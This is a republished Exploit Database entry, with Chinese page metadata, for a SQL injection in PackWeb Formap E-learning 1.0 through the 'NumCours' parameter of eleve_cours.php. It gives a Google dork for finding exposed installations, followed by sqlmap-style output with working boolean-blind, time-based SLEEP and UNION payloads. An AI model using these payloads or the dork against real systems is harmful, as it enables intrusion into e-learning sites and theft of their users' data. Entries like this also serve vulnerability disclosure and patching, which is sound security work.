PackWeb Formap E-learning 1.0 – ‘NumCours’ SQL Injection

• Exploit Database
• 35 阅读

• 作者： Amel BOUZIANE-LEBLOND
  日期： 2020-02-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48024/

• # Exploit Title: PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection
  # Google Dork: intitle: "PackWeb Formap E-learning"
  # Date: 2020-02-07
  # Exploit Author: Amel BOUZIANE-LEBLOND
  # Vendor Homepage: https://www.ediser.com/
  # Software Link: https://www.ediser.com/98517-formation-en-ligne
  # Version: v1.0
  # Tested on: Linux
  # CVE : N/A
  
  # Description:
  # The PackWeb Formap E-learning application from EDISER is vulnerable to
  # SQL injection via the 'NumCours' parameter on the eleve_cours.php
  
  ==================== 1. SQLi ====================
  
  http://localhost/eleve_cours.php?NumCours=[SQLI]
  
  The 'NumCours' parameter is vulnerable to SQL injection.
  
  GET parameter 'NumCours' is vulnerable.
  
  ---
  Parameter: #1* (URI)
  Type: boolean-based blind
  Title: OR boolean-based blind - WHERE or HAVING clause
  Payload: http://localhost/eleve_cours.php?NumCours=-9758' OR 6342=6342-- rSaq&static=1
  
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)
  Payload: http://localhost/eleve_cours.php?NumCours=' AND SLEEP(5)-- rGcs&static=1
  
  Type: UNION query
  Title: MySQL UNION query (47) - 1 column
  Payload: http://localhost/eleve_cours.php?NumCours=' UNION ALL SELECT CONCAT(0x7176707171,0x58794e58714e52434d7879444262574a506d6f41526e636444674d5a6863667a6943517841654d54,0x717a7a6a71)#&static=1
  ---
  [INFO] the back-end DBMS is MySQL
  back-end DBMS: MySQL >= 5.0.12